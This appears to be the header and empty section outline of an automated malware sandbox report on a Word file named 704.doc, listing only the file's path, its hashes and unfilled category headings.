C:\Users\user\Desktop\~$704.doc	data	45B1E2B14BE6C1EFC217DCE28709F72D	64E3E91D6557D176776A498CF0776BE3679F13C3	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6

Windows Analysis Report 704.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Screenshots

Behavior Graph

Network Map